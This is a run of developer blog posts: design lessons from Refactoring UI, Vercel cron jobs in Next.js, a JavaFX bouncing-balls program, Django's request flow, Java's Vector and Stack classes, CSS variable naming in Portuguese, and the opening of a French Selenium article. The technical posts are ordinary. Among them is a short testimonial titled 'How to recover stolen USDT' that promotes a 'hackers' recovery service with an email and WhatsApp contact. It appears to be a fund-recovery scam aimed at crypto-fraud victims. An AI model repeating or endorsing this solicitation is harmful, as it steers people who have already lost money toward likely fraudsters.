This answer was a breakthrough for me. It made perfect sense—we are designing an app, not a layout. So we shouldn't waste so much time starting the house by the roof because the details will be clearer once we have a collection of features to fill that layout.
> The easiest way to find yourself frustrated and stuck when working on a new design is to start by trying to “design the app.” When most people think about “designing the app,” they’re thinking about the shell.
\ - Page 7
## 3 - Start in Grayscale

This is something most of us probably know but still ignore; I don't know why.

We are still in chapter one, and the book keeps telling us to stop worrying so much about things that can be polished once the features are ready. The aspect we are "neglecting" now is **color**, and I couldn't feel more at peace about it. I can't even count how many times I've found myself stressing over the colors of my application. So instead of spending so much time thinking about colors, the book suggests developing the features in grayscale, always keeping in mind the hierarchy we are conveying with contrast, size, and space.
## 4 - Get Some Personality
> Every design has some sort of personality. A banking site might try to communicate secure and professional, while a trendy new startup might have a design that feels fun and playful.
\ - Page 17
This is something we normally underestimate, forgetting to choose a personality before starting to design. In my case, the application I am currently working on wasn't looking quite right; it didn't have any personality. Finally, I decided to go for something formal, conveying that characteristic sense of "We know what we are talking about."

It's still a work in progress.
## 5 - Systematize Everything
> The more systems you have in place, the faster you’ll be able to work, and the less you’ll second-guess your own decisions.
\ - Page 27
How many times have you found yourself asking: "What size should this be?" or maybe repeating a decision over and over again? The book strongly encourages us to develop following a system. I might add that a good solution to avoid falling into the complicated task of creating your own system is to copy someone else's system, like the one Tailwind is using.
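To make this concrete, a small spacing scale encoded as CSS custom properties might look like this (the values below are my own illustration, loosely based on Tailwind's defaults, not something prescribed by the book):

```css
/* Hypothetical example: a constrained spacing scale to pick from,
   instead of inventing a new value every time */
:root {
  --space-1: 0.25rem; /* 4px */
  --space-2: 0.5rem;  /* 8px */
  --space-4: 1rem;    /* 16px */
  --space-8: 2rem;    /* 32px */
}

.card {
  padding: var(--space-4); /* choose from the scale, don't guess */
}
```

With a scale like this, "what size should this be?" becomes a choice between a handful of options rather than an open question.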
## 6 - What's the Priority?
Have you felt that you don't know why your UI seems flat? I've asked myself that many times. I used to think it was because of the lack of animation in my app, so I added animations. That didn't solve it, so I thought it was the color scheme; it wasn't. This book gave me the answer:
> Visual hierarchy refers to how important the elements in an interface appear in relation to one another, and it’s the most effective tool you have for making something feel “designed.”
\ - Page 30
There you have the answer: visual hierarchy, reducing the noise in our design, helping the user to pay attention to what is most important on the screen. Playing with contrast, color, size, and space—those are our tools to achieve it.
## Before moving on
If you are enjoying my content or find it useful, give me a follow and leave me a comment or like—that's always helpful. I don't want to stop you, so enjoy the post, and thanks for reading.
## 7 - Don’t Use Gray Text on Colored Backgrounds
I've included this because it is an error that I used to make when trying to create hierarchy in my UI.
> Making the text closer to the background color is what actually helps create hierarchy, not making it light gray.
\ - Page 37
Just a little hint, worth mentioning.


## 8 - Balance Weight and Contrast
Have you ever noticed that when you add an icon to your app, especially a filled one, it jumps off the screen? That's because a solid icon covers more surface area within the same footprint, since its interior space is filled in. This can break your hierarchy, which, as we saw before, is probably the most important quality a UI needs in order to look "designed."

To keep this from happening, we reduce the icon's contrast with the background by shifting its color closer to the background color.


## 9 - Start with Too Much Space and Go Down
> One of the easiest ways to clean up a design is to simply give every element a little more room to breathe.
\ - Page 56
It may sound absurd, but every time you start to design something, add a little bit more space than you would initially. For example, normally I start with padding-4 on Tailwind; now I'm starting with padding-8.
Increase your gap, increase your padding, and increase your margin. Later, you can go down, but let's start with more empty space.

## 10 - How Much Width Do You Need?
I love designing for mobile—it's much easier, less space, less content. Just properly position your items on the screen, and everything works perfectly. Try to take that same approach to desktop, and surprise, surprise, your application feels strange.
The book gives us a solution:
> If you only need 600px, use 600px. Spreading things out or making things unnecessarily wide just makes an interface harder to interpret, while a little extra space around the edges never hurt anyone.
\ - Page 65
In the same way, just because you shrink your canvas doesn't mean that everything has to behave that way. You might use full width on your navbar, but shrink your dashboard. Play with combining these ideas and remember:
> Instead of sizing elements like this based on a grid, give them a max-width so they don’t get too large, and only force them to shrink when the screen gets smaller than that max-width.
\ - Page 77
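As a rough sketch of that advice (the class name and width value here are mine, not the book's):

```css
/* Hypothetical example: cap the content width instead of stretching it */
.content {
  width: 100%;          /* shrink only on screens narrower than the cap */
  max-width: 600px;     /* only as wide as the content actually needs */
  margin-inline: auto;  /* the leftover space becomes breathing room */
}
```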
## 11 - Hide Actions for Data the User Hasn't Created
Another thing that may be obvious but that at least in my case, I always forgot to take into consideration. Let me show you something from my application again:

This is the customers' dashboard on mobile, and this is what will be displayed once the user loads data. But what will they see if there is no data?

Not that pretty, right? But that's the default state of the application. What if we design for this state?

Much better. That's basically what the book is telling us to do: account for these small but important states.
## 12 - Use Fewer Borders
> When you need to create separation between two elements, try to resist immediately reaching for a border.
\ - Page 206
Using borders can add noise to the UI, something that we are trying to avoid. So instead of adding borders, a better approach would be:
> What better way to create separation between elements than to simply increase the separation?
\ - Page 209
That extra space automatically causes the visual effect of differentiation between elements.


## Wrapping Up
I hope you find this post useful. This was an exercise for myself, trying to summarize a 300-page book into the things that were most helpful for me. Originally, this post was going to have 25 lessons, but I think it's better if I leave it at just 12 lessons because these are the most helpful, at least for me.
Once again, I invite you to buy the book because it has a lot more information and beautiful examples than the ones I mentioned here. So please take a [look](https://www.refactoringui.com/).
## Before You Go
Thank you for reading, and if you really enjoyed the post, would you help me pay my rent?
[---------------------------------------------------------------------------] 0% of $400, [let's pay my rent](https://buymeacoffee.com/juanemilio) | juanemilio31323 |
1,917,816 | Automate the tasks using Vercel Cron Jobs | Cron Jobs are commands that run automatically at specific time intervals (e.g. daily, weekly,... | 0 | 2024-07-09T21:23:38 | https://dev.to/onurhandtr/automate-the-tasks-using-vercel-cron-jobs-ieh | vercel, nextjs, typescript, cronjobs | Cron Jobs are commands that run automatically at specific time intervals (e.g. daily, weekly, hourly).
The Cron job feature can be used for operations performed at specific intervals such as data synchronization, email sending, backup operations, and more.
Vercel, on the other hand, hosts the Cron Jobs feature on its platform and offers space to manage and run them.
### How to Use
Vercel has prepared a comprehensive [document](https://vercel.com/docs/cron-jobs/manage-cron-jobs) on this topic. You can get more detailed information about how to create and manage it.
In this article, I will talk step by step about how I use Cron Jobs in my [Lotus](https://github.com/onurhan1337/lotus) project.
### Configuration
First, I create a **vercel.json** file in the main directory of the project. In this file, we will specify the relevant API route path information and frequency.
The Lotus project contains challenges and each of them has end dates. I set the frequency for each new day so that the challenge status information is updated when the end date arrives.
```json
{
  "crons": [
    {
      "path": "/api/cron",
      "schedule": "0 0 * * *"
    }
  ]
}
```
The values next to `schedule` may look cryptic, but they specify the frequency. The expression in the snippet above means once every 24 hours, at midnight. Below you can view other examples shared in the documentation.

Also, if the interval you want to set is not listed, you can easily find out the corresponding time interval by accessing the relevant document page from the [link](https://vercel.com/docs/cron-jobs) here and using the Cron job validator feature.

### Just use it
After the configuration phase, all we need to do is to create a file in the API route we specified in the vercel.json file and then write the process file we want into it.
In the Vercel document, examples are [given](https://vercel.com/docs/cron-jobs/quickstart) for this using the World Time API, Serverless and Edge functions are supported.
```ts
// app/api/cron/route.ts
export async function GET() {
  const result = await fetch(
    'http://worldtimeapi.org/api/timezone/America/Chicago',
    {
      cache: 'no-store',
    },
  );
  const data = await result.json();

  return Response.json({ datetime: data.datetime });
}
```
### Securing cron jobs
You can secure cron jobs by assigning the **CRON_SECRET** environment key. Vercel recommends using a random password of 16 characters for this.
Then this defined key is automatically sent with the header as Authorization information when a Vercel cron job is called.
```ts
import type { NextRequest } from 'next/server';
export function GET(request: NextRequest) {
  const authHeader = request.headers.get('authorization');
  if (authHeader !== `Bearer ${process.env.CRON_SECRET}`) {
    return new Response('Unauthorized', {
      status: 401,
    });
  }

  return Response.json({ success: true });
}
```
### Limitations
You don’t need a Pro plan to use the Cron Jobs feature, but if you want to use it more extensively, you should take a look at the [limitations](https://vercel.com/docs/cron-jobs/usage-and-pricing).

### Deploy
You can either use it via Vercel CLI with the command below or by committing the changes to GitHub and then redeploying.
```bash
$ vercel deploy --prod
```
### Cron Jobs in Lotus
Cron Jobs has many options such as dynamic routes and secure requests, but my needs in this regard were more limited. So I set it to trigger once every 24 hours, as shown in the vercel.json file I shared above.
Then I created an API route. First, I get the current date and use Prisma's `lte` filter with it to find the challenges that are still active but whose end date is on or before today.
```ts
import prisma from "@/lib/prisma";
import { NextResponse } from "next/server";
export async function GET() {
  try {
    const currentDate = new Date();

    const expiredChallenges = await prisma.challenge.findMany({
      where: {
        endDate: {
          lte: currentDate,
        },
        isActive: "ACTIVE",
      },
    });

    if (expiredChallenges.length === 0) {
      return NextResponse.json({
        message: "No expired challenges found",
      });
    }

    return NextResponse.json({
      message: "Expired challenges updated",
    });
  } catch (error: any) {
    return NextResponse.json({
      message: "Error updating challenges.",
      error: error.message,
    });
  }
}
```
Since I only needed the ID information, I defined an array and extracted the **expiredChallenges**.
Then I updated the isActive property of each one to **COMPLETED** using Prisma’s updateMany property.
```ts
const expiredChallengeIds = expiredChallenges.map(
  (challenge) => challenge.id
);

await prisma.challenge.updateMany({
  where: {
    id: {
      in: expiredChallengeIds,
    },
  },
  data: {
    isActive: "COMPLETED",
  },
});
```
### Manage Cron Jobs
You can come to the settings page of the project via the Vercel dashboard, click on Cron Jobs and then view it. You can review the logs or run manually to test them.

Thank you for reading my article. Follow me on [X](https://x.com/onurhan1337).
https://buymeacoffee.com/onurhan | onurhandtr |
1,917,817 | Case Study: Bouncing Balls | This section presents a program that displays bouncing balls and enables the user to add and remove... | 0 | 2024-07-09T21:24:07 | https://dev.to/paulike/case-study-bouncing-balls-bh9 | java, programming, learning, beginners | This section presents a program that displays bouncing balls and enables the user to add and remove balls.
[Section](https://dev.to/paulike/case-study-bouncing-ball-39cj) presents a program that displays one bouncing ball. This section presents a program that displays multiple bouncing balls. You can use two buttons to suspend and resume the movement of the balls, a scroll bar to control the ball speed, and the + and - buttons to add or remove a ball, as shown in Figure below.

The example in [Section](https://dev.to/paulike/case-study-bouncing-ball-39cj) only had to store one ball. How do you store the multiple balls in this example? The **Pane**’s **getChildren()** method returns an **ObservableList<Node>**, a subtype of **List<Node>**, for storing the nodes in the pane. Initially, the list is empty. When a new ball is created, add it to the end of the list. To remove a ball, simply remove the last one in the list.
Each ball has its state: the x-, y-coordinates, color, and direction to move. You can define a class named **Ball** that extends **javafx.scene.shape.Circle**. The x-, y-coordinates and the color are already defined in **Circle**. When a ball is created, it starts from the upper-left corner and moves downward to the right. A random color is assigned to a new ball.
The **MultipleBallPane** class is responsible for displaying the balls, and the **MultipleBounceBall** class places the control components and implements the control. The relationship of these classes is shown in Figure below. The code below gives the program.

```
package application;

import javafx.animation.KeyFrame;
import javafx.animation.Timeline;
import javafx.application.Application;
import javafx.beans.property.DoubleProperty;
import javafx.geometry.Pos;
import javafx.scene.Node;
import javafx.stage.Stage;
import javafx.scene.Scene;
import javafx.scene.control.Button;
import javafx.scene.control.ScrollBar;
import javafx.scene.layout.BorderPane;
import javafx.scene.layout.HBox;
import javafx.scene.layout.Pane;
import javafx.scene.paint.Color;
import javafx.scene.shape.Circle;
import javafx.util.Duration;

public class MultipleBounceBall extends Application {
    @Override // Override the start method in the Application class
    public void start(Stage primaryStage) {
        MultipleBallPane ballPane = new MultipleBallPane();
        ballPane.setStyle("-fx-border-color: yellow");

        Button btAdd = new Button("+");
        Button btSubtract = new Button("-");
        HBox hBox = new HBox(10);
        hBox.getChildren().addAll(btAdd, btSubtract);
        hBox.setAlignment(Pos.CENTER);

        // Add or remove a ball
        btAdd.setOnAction(e -> ballPane.add());
        btSubtract.setOnAction(e -> ballPane.subtract());

        // Pause and resume animation
        ballPane.setOnMousePressed(e -> ballPane.pause());
        ballPane.setOnMouseReleased(e -> ballPane.play());

        // Use a scroll bar to control animation speed
        ScrollBar sbSpeed = new ScrollBar();
        sbSpeed.setMax(20);
        sbSpeed.setValue(10);
        ballPane.rateProperty().bind(sbSpeed.valueProperty());

        BorderPane pane = new BorderPane();
        pane.setCenter(ballPane);
        pane.setTop(sbSpeed);
        pane.setBottom(hBox);

        // Create a scene and place the pane in the stage
        Scene scene = new Scene(pane, 250, 150);
        primaryStage.setTitle("MultipleBounceBall"); // Set the stage title
        primaryStage.setScene(scene); // Place the scene in the stage
        primaryStage.show(); // Display the stage
    }

    public static void main(String[] args) {
        Application.launch(args);
    }

    private class MultipleBallPane extends Pane {
        private Timeline animation;

        public MultipleBallPane() {
            // Create an animation for moving the ball
            animation = new Timeline(new KeyFrame(Duration.millis(50), e -> moveBall()));
            animation.setCycleCount(Timeline.INDEFINITE);
            animation.play(); // Start animation
        }

        public void add() {
            Color color = new Color(Math.random(), Math.random(), Math.random(), 0.5);
            getChildren().add(new Ball(30, 30, 20, color));
        }

        public void subtract() {
            if (getChildren().size() > 0) {
                getChildren().remove(getChildren().size() - 1);
            }
        }

        public void play() {
            animation.play();
        }

        public void pause() {
            animation.pause();
        }

        public void increaseSpeed() {
            animation.setRate(animation.getRate() + 0.1);
        }

        public void decreaseSpeed() {
            animation.setRate(animation.getRate() > 0 ? animation.getRate() - 0.1 : 0);
        }

        public DoubleProperty rateProperty() {
            return animation.rateProperty();
        }

        protected void moveBall() {
            for (Node node: this.getChildren()) {
                Ball ball = (Ball) node;
                // Check boundaries
                if (ball.getCenterX() < ball.getRadius()
                        || ball.getCenterX() > getWidth() - ball.getRadius()) {
                    ball.dx *= -1; // Change ball move direction
                }

                if (ball.getCenterY() < ball.getRadius()
                        || ball.getCenterY() > getHeight() - ball.getRadius()) {
                    ball.dy *= -1; // Change ball move direction
                }

                // Adjust ball position
                ball.setCenterX(ball.dx + ball.getCenterX());
                ball.setCenterY(ball.dy + ball.getCenterY());
            }
        }
    }

    class Ball extends Circle {
        private double dx = 1, dy = 1;

        Ball(double x, double y, double radius, Color color) {
            super(x, y, radius);
            setFill(color); // Set ball color
        }
    }
}
```
The **add()** method creates a new ball with a random color and adds it to the pane. The pane stores all the balls in a list. The **subtract()** method removes the last ball in the list.

When the user clicks the + button, a new ball is added to the pane. When the user clicks the - button, the last ball in the list is removed.

The **moveBall()** method in the **MultipleBallPane** class gets every ball in the pane's list and adjusts each ball's position. | paulike |
1,917,818 | Mastering Django: A Workflow Guide | Understanding the Django Framework: A Deep Dive into its Working Flow Django is a... | 0 | 2024-07-09T21:29:39 | https://dev.to/tejas_khanolkar_473f3ed1a/mastering-django-a-workflow-guide-mdm | chaiaurcode, python, django, webdev |
## Understanding the Django Framework: A Deep Dive into its Working Flow
Django is a full-stack framework created in Python. To understand Django, it’s essential first to grasp the concept of a framework. A framework is the structure or skeleton of your application. It provides a basic foundation upon which you build your application. When developing an app using a framework, you must adhere to its rules and conventions. These rules are strict to ensure your application runs smoothly in a production environment. Official documentation for each framework is available to guide you in creating applications that comply with these rules.
Django has its own flow structure, which you must follow to inject your code correctly. Deviating from this structure can lead to errors and issues. Let’s delve into the main topic and understand the working flow of the Django framework.

## Request Handling in Django
1. User Request: The process begins when a user sends a request to the server. In this context, the server is the Django server.
2. URL Resolver: The Django server catches the request and passes it to the URL resolver, a private file in Django that developers do not have access to. This file resolves the URL and forwards the request to the urls.py file, where the routes are mapped to views.
## Understanding Views and MVT Architecture
3. URL Mapping: In the urls.py file, the URL resolver checks which route is mapped to which view and sends the request to the corresponding view function in the views.py file.
4. Views: In Django, a view is a function that takes a request as an argument and returns a response to the client. To fully understand views, you need to understand the MVT architecture that Django follows. MVT stands for Model, View, Template. In this architecture, the view acts as a communicator between models and templates.
## Interaction with Models
5. Model Interaction: Based on the nature of the request, the view may interact with models. A model in Django represents a table in the database. While you could interact directly with the database, Django provides a way to interact with it through models, which offer an abstract layer. This abstraction allows you to change the database with a single setting without interrupting the rest of the code.
## Returning the Response
6. Template Rendering: After interacting with the model, control returns to the view, which then searches for the appropriate template to return to the client. Templates in Django are specific folders containing HTML files. These HTML files are called templates because their content is dynamic, changing with the help of the Jinja template engine. Jinja allows you to inject logic into your HTML files, making them dynamic.
7. Response: After rendering the template, the controller (in this case, the view) prepares the final response and sends it back to the user (client).
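Stripped of all the framework machinery, the whole flow above can be sketched in a few lines of plain Python. To be clear, this is not real Django code; every name below is made up purely to illustrate how the resolver, view, model, and template hand the request to one another:

```python
# Plain-Python sketch of Django's request flow (illustrative only, not Django code).

MODEL_TABLE = ["Ada", "Linus"]  # stands in for a database table behind a model

TEMPLATES = {"customer_list": "Customers: {names}"}  # stands in for an HTML template

def render(template_name: str, context: dict) -> str:
    """Stands in for the template engine (Jinja-style variable substitution)."""
    return TEMPLATES[template_name].format(**context)

def customer_list(request: str) -> str:
    """A 'view': takes the request, talks to the model, returns a response."""
    customers = MODEL_TABLE  # stands in for Customer.objects.all()
    return render("customer_list", {"names": ", ".join(customers)})

URLPATTERNS = {"/customers/": customer_list}  # stands in for urls.py

def handle(request_path: str) -> str:
    """Stands in for the URL resolver: route the request to the mapped view."""
    view = URLPATTERNS[request_path]
    return view(request_path)

print(handle("/customers/"))  # Customers: Ada, Linus
```

In real Django, `URLPATTERNS` is your `urls.py`, `customer_list` lives in `views.py`, `MODEL_TABLE` is a model backed by the database, and `render` is the template engine.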
## Conclusion
This is the overall workflow of a Django application. From receiving a request to returning a response, Django’s structure ensures a streamlined process that adheres to its MVT architecture. By following this flow, developers can create robust and scalable web applications efficiently.
| tejas_khanolkar_473f3ed1a |
1,917,819 | Vector and Stack Classes | Vector is a subclass of AbstractList, and Stack is a subclass of Vector in the Java API. The Java... | 0 | 2024-07-09T21:33:03 | https://dev.to/paulike/vector-and-stack-classes-k4 | java, programming, learning, beginners | **Vector** is a subclass of **AbstractList**, and **Stack** is a subclass of **Vector** in the Java API. The Java Collections Framework was introduced in Java 2. Several data structures were supported earlier, among them the **Vector** and **Stack** classes. These classes were redesigned to fit into the Java Collections Framework, but all their old-style methods are retained for
compatibility.
**Vector** is the same as **ArrayList**, except that it contains synchronized methods for accessing and modifying the vector. Synchronized methods can prevent data corruption when a vector is accessed and modified by two or more threads concurrently. For the many applications that do not require synchronization, using **ArrayList** is more efficient than using **Vector**.
The **Vector** class extends the **AbstractList** class. It also has the methods contained in the original **Vector** class defined prior to Java 2, as shown in Figure below.

Most of the methods in the **Vector** class listed in the UML diagram in Figure above are similar to the methods in the **List** interface. These methods were introduced before the Java Collections Framework. For example, **addElement(Object element)** is the same as the **add(Object element)** method, except that the **addElement** method is synchronized. Use the **ArrayList** class if you don’t need synchronization. It works much faster than **Vector**.
The **elements()** method returns an **Enumeration**. The **Enumeration** interface was introduced prior to Java 2 and was superseded by the **Iterator** interface. **Vector** is widely used in Java legacy code because it was the Java resizable array implementation before Java 2.
In the Java Collections Framework, **Stack** is implemented as an extension of **Vector**, as illustrated in Figure below.

The **Stack** class was introduced prior to Java 2. The methods shown in Figure above were used before Java 2. The **empty()** method is the same as **isEmpty()**. The **peek()** method looks at the element at the top of the stack without removing it. The **pop()** method removes the top element from the stack and returns it. The **push(Object element)** method adds the specified element to the stack. The **search(Object element)** method checks whether the specified element is in the stack. | paulike |
1,917,820 | Nomeação de Variáveis CSS: Boas Práticas e Abordagens | Recentemente, enquanto navegava na internet, como todo bom desenvolvedor front-end, quis "roubar" a... | 0 | 2024-07-10T10:09:19 | https://dev.to/leomunizq/nomeacao-de-variaveis-css-boas-praticas-e-abordagens-48o3 | Recentemente, enquanto navegava na internet, como todo bom desenvolvedor front-end, quis "roubar" a paleta de cores de um site. Então, abri o inspetor de elementos para copiar os valores hexadecimais das cores e me deparei com uma surpresa inusitada: as variáveis CSS estavam nomeadas de forma inconsistente.
<br><br>
<figure style="width: 48%; margin-right: 2%;">
<img src="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y26m14p3n9phpztltqt1.png" alt="css inconsistency names" style="width: 48%; margin-right: 2%;"/>
<figcaption>I swear, this is not a meme.</figcaption>
</figure>
<br><br>
As you can see, the variables' values did not match their names, which is a classic example of naming inconsistency. It is crucial to avoid this in your codebase.

Naming CSS variables is essential for the organization, readability, and maintainability of front-end projects. Although it may seem trivial, many companies still don't adopt a naming standard.

This article explores several approaches to naming CSS variables, highlighting the importance of semantic choices and consistent practices. If you don't yet know how to declare variables, I recommend first reading <a target="_blank" rel="noopener noreferrer" href="https://developer.mozilla.org/pt-BR/docs/Web/CSS/Using_CSS_custom_properties">this article on MDN Web Docs</a>, and then coming back here so we can talk about the various possible approaches.
<br><br>
## Table of Contents

<ul>
<li>
<a href="#why-use-variables">Why Use CSS Variables?</a>
</li>
<li>
<a href="#benefits">Advantages of CSS Variables</a>
</li>
<li>
<a href="#approaches">Approaches to Naming CSS Variables</a>
</li>
<li>
<a href="#colors">Color-Based Naming</a>
</li>
<li>
<a href="#semantic">Semantic Naming</a>
</li>
<li>
<a href="#combination">Combining Semantic and Color Names</a>
</li>
<li>
<a href="#context">Contextual Naming</a>
</li>
<li>
<a href="#scope">Scope-Based Naming</a>
</li>
<li>
<a href="#components">Component-Based Naming</a>
</li>
<li>
<a href="#type-valor">Value-Type-Based Naming</a>
</li>
<li>
<a href="#theme">Theme-Based Naming</a>
</li>
<li>
<a href="#tools">Linting Tools for CSS Variables</a>
</li>
<li>
<a href="#conclusion">Conclusion</a>
</li>
</ul>
<br><br>
### Why Use CSS Variables? <a id="why-use-variables" href="#why-use-variables">🔗</a>

According to CSS-Tricks, CSS variables (custom properties) bring flexibility and power to CSS, enabling dynamic themes and style adjustments at runtime. Jonathan Harrell points out that CSS variables are native, dynamic, and can be redefined inside media queries, and that they work in any CSS context, preprocessed or not.
<br><br>

#### Advantages of CSS Variables <a id="benefits" href="#benefits">🔗</a>

- **Reuse:** They allow values to be used consistently across the whole project.
- **Maintainability:** They make it easy to update styles by changing values in a single place.
- **Readability:** Meaningful names make the code easier to understand and maintain.
### Approaches to Naming CSS Variables <a id="approaches" href="#approaches">🔗</a>

**1. Color-Based Naming** <a id="colors" href="#colors">🔗</a>

Naming CSS variables after their colors is a straightforward approach. This technique can work for small projects or when the colors have limited use, but you should watch out for maintenance problems. I'm mentioning this approach here, but I don't recommend using it.

```css
:root {
  --blue: #4267b2;
  --indigo: #3b2614;
  --purple: #754218;
  --pink: #f1ece7;
  --red: #b50000;
  --orange: #dc3545;
  --yellow: #f2b300;
  --green: #009733;
}
```

**Advantages:**

- **Immediate clarity:** Makes it easy to identify the exact color.
- **Simplicity:** Easy to implement.

**Disadvantages:**

- **Limited semantics:** Doesn't indicate the color's purpose.
- **Reuse:** Can become confusing in larger projects with multiple usage contexts.
- **Maintenance:** Changing a color can break semantic consistency.
### 2. Semantic Naming <a id="semantic" href="#semantic">🔗</a>

Naming variables based on their purpose or usage context improves code comprehension.

```css
:root {
  --primary-color: #4267b2;
  --secondary-color: #3b2614;
  --accent-color: #754218;
  --background-color: #f1ece7;
  --error-color: #b50000;
  --warning-color: #dc3545;
  --info-color: #f2b300;
  --success-color: #009733;
}
```

**Advantages:**

- **Semantic clarity:** Indicates the purpose or context of the color.
- **Easy maintenance:** Simple to update and reuse.
- **Theme support:** Makes it easy to implement different themes.
- **Consistency:** Helps teams collaborate.

**Disadvantages:**

- **Abstraction:** May require more effort to map names to specific colors.
- **Learning curve:** Can be challenging for new developers.
### 3. Combining Semantic and Color Names <a id="combination" href="#combination">🔗</a>

Combines semantics with a description of the color, providing both clarity and context.

```css
:root {
  --primary-blue: #4267b2;
  --secondary-brown: #3b2614;
  --accent-purple: #754218;
  --background-pink: #f1ece7;
  --error-red: #b50000;
  --warning-orange: #dc3545;
  --info-yellow: #f2b300;
  --success-green: #009733;
}
```

**Advantages:**

- **Detail:** Combines immediate clarity with semantic context.
- **Extra context:** Easier to understand and maintain.

**Disadvantages:**

- **Verbosity:** Can lead to longer, more verbose names.
### 4. Contextual Naming <a id="context" href="#context">🔗</a>

Variables are named according to their usage context.

```css
:root {
  --header-background: #333;
  --header-color: #fff;
  --footer-background: #222;
  --footer-color: #ccc;
}

.header {
  background-color: var(--header-background);
  color: var(--header-color);
}

.footer {
  background-color: var(--footer-background);
  color: var(--footer-color);
}
```

**Advantages:**

- **Contextual clarity:** Makes it easy to identify each variable's purpose in specific parts of the layout.
- **Avoids conflicts:** Useful in large projects with many components.

**Disadvantages:**

- **Potential repetition:** Variables may end up duplicated across different contexts.
### 5. Scope-Based Naming <a id="scope" href="#scope">🔗</a>

Variables are named to reflect the specific scope where they will be used. This can help avoid naming conflicts in large projects.

```css
:root {
  --button-primary-bg: #007bff;
  --button-primary-color: #fff;
  --button-secondary-bg: #6c757d;
  --button-secondary-color: #fff;
}

.button-primary {
  background-color: var(--button-primary-bg);
  color: var(--button-primary-color);
}

.button-secondary {
  background-color: var(--button-secondary-bg);
  color: var(--button-secondary-color);
}
```

**Advantages:**

- **Avoids conflicts:** Reduces the chance of name collisions in large codebases.
- **Clear scope:** Makes the code easier to maintain and read.

**Disadvantages:**

- **Complexity:** Managing many different scopes can add complexity.
### 6. Nomeação Baseada em Componentes (Component-based Naming) <a id="components" href="#components">🔗</a>
As variáveis são nomeadas de acordo com os componentes específicos da interface. Isso é comum em metodologias como BEM (Block Element Modifier).
```css
:root {
--card-background: #fff;
--card-border: 1px solid #ddd;
--card-title-color: #333;
}
.card {
background-color: var(--card-background);
border: var(--card-border);
}
.card-title {
color: var(--card-title-color);
}
```
**Advantages:**
**Component clarity:** Makes it easy to identify the variables related to specific components.
**Modularity:** Makes it easier to reuse styles across different parts of the project.
**Disadvantages:**
**Maintenance:** Keeping naming consistent can be harder in very large projects.
### 7. Type-based Naming <a id="type-valor" href="#type-valor">🔗</a>
Variables are named to reflect the type of value they represent. This is useful for keeping the whole project consistent.
```css
:root {
--color-primary: #3498db;
--color-secondary: #2ecc71;
--font-size-small: 12px;
--font-size-medium: 16px;
--font-size-large: 24px;
--spacing-small: 8px;
--spacing-medium: 16px;
--spacing-large: 32px;
}
.text-primary {
color: var(--color-primary);
}
.text-secondary {
color: var(--color-secondary);
}
.small-text {
font-size: var(--font-size-small);
}
.medium-text {
font-size: var(--font-size-medium);
}
.large-text {
font-size: var(--font-size-large);
}
.margin-small {
margin: var(--spacing-small);
}
.margin-medium {
margin: var(--spacing-medium);
}
.margin-large {
margin: var(--spacing-large);
}
```
**Advantages:**
**Consistency:** A clear convention for value types makes the code easier to maintain and read.
**Modularity:** Makes it easier to reuse variables in different contexts.
**Disadvantages:**
**Verbosity:** Can result in long names.
### 8. Theme-based Naming (Theming) <a id="theme" href="#theme">🔗</a>
Variables are named to reflect different themes or modes (such as light mode and dark mode).
```css
:root {
--color-background-light: #ffffff;
--color-background-dark: #000000;
--color-text-light: #000000;
--color-text-dark: #ffffff;
}
.light-theme {
background-color: var(--color-background-light);
color: var(--color-text-light);
}
.dark-theme {
background-color: var(--color-background-dark);
color: var(--color-text-dark);
}
```
**Advantages:**
**Flexibility:** Makes it easy to create and maintain different visual themes.
**Consistency:** Variables can simply be swapped to change the theme.
**Disadvantages:**
**Complexity:** Managing multiple themes can add complexity to the project.
### Linting Tools for CSS Variables <a id="tools" href="#tools">🔗</a>
Linting tools can help ensure that variables follow specific naming conventions, promoting consistency across the codebase. Examples of such tools include:
- <a href="https://stylelint.io/" target="_blank" rel="noopener noreferrer" >Stylelint</a>: A modern, flexible CSS linter that can be configured to check the consistency of variables.
<br>
- <a href="https://postcss.org/" target="_blank" rel="noopener noreferrer" >PostCSS</a>: A tool that transforms CSS with plugins, including variable checks.
<br>
- <a href="https://github.com/CSSLint/csslint" target="_blank" rel="noopener noreferrer" >CSS Linter</a>: A tool aimed at ensuring the correct and consistent use of CSS variables.
<br><br>
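As a concrete sketch of the Stylelint option, a `.stylelintrc.json` using the built-in `custom-property-pattern` rule can enforce a kebab-case convention for custom property names (the regex and message below are illustrative choices, not the only possible ones):

```json
{
  "rules": {
    "custom-property-pattern": [
      "^([a-z][a-z0-9]*)(-[a-z0-9]+)*$",
      { "message": "Expected custom property name to be kebab-case" }
    ]
  }
}
```

With this configuration, a declaration such as `--headerBackground: #333;` should be flagged, while `--header-background: #333;` passes.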
### Conclusion <a id="conclusion" href="#conclusion">🔗</a>
These approaches and practices can help ensure that the use of CSS variables in your projects is efficient, organized, and easy to maintain. Choosing the right approach depends on the needs and scale of your project, as well as the preferences and practices of your development team.
### Credits <a id="credits" href="#credits">🔗</a>
This article was inspired by personal experience and by studies from several reference sources, including CSS Tricks and the work of <a target="_blank" rel="noopener noreferrer" href="https://www.jonathan-harrell.com/about/">Jonathan Harrell</a>. | leomunizq |
1,917,821 | How to recover stolen USDT | Formerly I presumed I would never be able to retrieve the money I had lost to fraudsters. I made an... | 0 | 2024-07-09T21:39:22 | https://dev.to/kate_wille_2c1b4f093d4450/how-to-recover-stolen-usdt-pah | Formerly I presumed I would never be able to retrieve the money I had lost to fraudsters. I made an investment with a bitcoin investing website in the First quarter of 2024 just to discover that it was a scam. I got in touch with a few hackers in an effort to get my money back, but they all turned out to be swindlers who took my hard-earned cash. I was in a predicament, distraught, and certain that I had descended to my lowest point. All that changed when I came across a review of Century Hackers Services online. An alternative could not cut to the quick because I was eager to recover all of the money I had spent on that website, that was the end of my troubles. I made the decision to try my luck once more, to which I got in touch with Century Hackers Recovery Services and everything changed. The firm stepped in and quickly aided in the recovery of all of my money. I can attest to their high level of commitment and that they got the best recovery staff. You can also contact the firm by using:
E-mail : century@cyberservices.com
whatsApp : +31 (622) 673-038
| kate_wille_2c1b4f093d4450 | |
1,917,823 | Explication de SeleniumWebDriver : Automatisez votre Flux de Tests Web | Salut à tous, Aujourd'hui, je vais vous parler de Selenium WebDriver, une nouvelle notion que je... | 0 | 2024-07-10T15:53:18 | https://dev.to/laroseikitama/explication-de-seleniumwebdriver-automatisez-votre-flux-de-tests-web-e88 | webdev, selenium, testing, learning | Hello everyone,
Today I am going to talk about Selenium WebDriver, a concept I have just learned. In this article we will focus mainly on theory, in order to understand what Selenium WebDriver is, what it is used for, and several related concepts.
## Table of Contents
- [What is Selenium?](#qu-est-ce-que-selenium-?)
